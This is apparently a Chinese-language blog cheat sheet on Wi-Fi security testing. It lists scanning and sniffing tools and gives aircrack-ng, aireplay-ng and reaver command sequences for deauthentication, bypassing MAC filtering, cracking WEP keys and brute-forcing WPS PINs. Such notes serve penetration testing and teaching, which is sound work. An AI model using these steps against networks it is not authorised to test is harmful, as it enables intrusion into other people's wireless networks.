无线安全[wifi基础知识]

测试思维导图

无线安全[wifi基础知识]_第1张图片

测试工具集

windows platform

  • Vistumbler 主动式扫描/Google Earth实时可视化/GPS定位KML文件生成器
  • NetMon/ 被动嗅探
  • AirPcap 被动嗅探/关联各种程序,如:cain,wireshark
  • CommView 可以捕获加密通信的协议握手过程,导入到aircrack-ng中进行破解/数据发送功能/数据包注入[商业版]

os x platform

  • KisMac 被动型扫描/数据包注入/GPS

linux platform

  • Kismet 被动型扫描/捕获的数据包文件".pcap"中带GPS位置标签
  • airodump-ng

 

测试步骤

防护:隐藏ssid, 绑定mac地址

隐藏ssid, 测试步骤:

  • 1.使用aireplay-ng进shi行解除认证攻击[当检测到一个隐藏ssid];命令: aireplay-ng --deauth 1 -a 基本服务集标识 -c mac_address wlan0  原因:主要是没有管理帧保护
  • 2.嗅探数据包
  • 3.破解密钥或者弱口令

绑定Mac地址, 测试步骤:

  • 1.解除认证,修改本地mac地址 
  • 2.修改本地mac地址和攻击一样,同时使用 
  • 3.等待下载,在使用修改的mac地址上线

测试wep无线网络:

有客户状态破解:
airmon-ng start wlan0 1 # 进入“检测模式”
ifconfig                # 查看设置的模拟监听接口
airodump-ng wlan0mon    # 对模拟监听接口进行数据包嗅探
airodump-ng --channel 1 --bssid 22:w3:w34 --write test mon0 # 根据channel和ssid捕获信息,生成test-01.pcap的数据包
aireplay-ng --arpreplay -h 客户端的mac -b bssid的mac mon0 # 获取更多的数据包,加快破解信息
aircrack-ng -b bssid的mac test-01.pcap #破解数据包,获取密钥

无客户端状态破解:
airodump-ng --channel 22 --bssid 22:w3:w34 --write quiet_type mon0
ifconfig mon0 | grep HWaddr
aireplay-ng --fakeauth 1 -o 1 -e quiet_type -b bssid的mac -h 无线网卡的mac地址 mon0 # 假认证; 如果假认证失败,就是ap使用绑定mac,使用上面的方法绕过mac地址绑定
aireplay-ng --fragment -e quiet_type -b bssid的mac -h bssid的mac mon0 # 启动碎片化攻击; 如果失败,使用chopchop攻击
# 制作arp包
# 注入制作的arp包
# 启动aircrack-ng 


使用reaver破解:
1. 把无线网卡设置成监听模式: sudo airmon-ng start wlan0
   这样就将wlan0无线网卡设置与监听模式,监听网卡id为 mon0
2. 用wash来查看AP是不是支持WPS:
   -方法1, 搜索附近AP: 运行sudo wash -i mon0 -C
   -方法2, 使用已经获取的cap文件: wash-C -f xxx01.cap
  如果目标SSID在WPSlock一栏显示no,则证明可以继续破解,否则请不要继续用reaver来进行破解
4. 发现目标SSID支持WPS, 执行:sudo reaver -i mon0 -b AP_MAC -vv
   其中 -i  后的参数是监听模式网卡id
          -b 是目标路由的BSSID
          -vv 显示详细信息
          -L 防止路由WPS死锁
          
5. 在获得WPS PIN 之后可以快速破解登录密码,执行 reaver -i mon0-b AP_Mac -p WPS_PIN 
    其中 -i 后的参数是监听模式网卡id
           -b是目标路由的BSSID
           -p是已经获取的WPS PIN

6.破解出密码后在终端中输入 sudo airmon-ng stop mon0 关闭监控模式,不然无线网卡会一直向刚刚的AP进行注入的,用ctrl+c退出或者直接关闭终端都是不行的。      
一般暴力破解WPS需要信号强度至少4-5格,这样的情况下,耗时平均为4-10个小时

 

测试wpa和wp2:

  • http://topspeedsnail.com/kali-linux-crack-wifi-wpa/

 

参考

 

 

 

你可能感兴趣的:(Wireless,Security)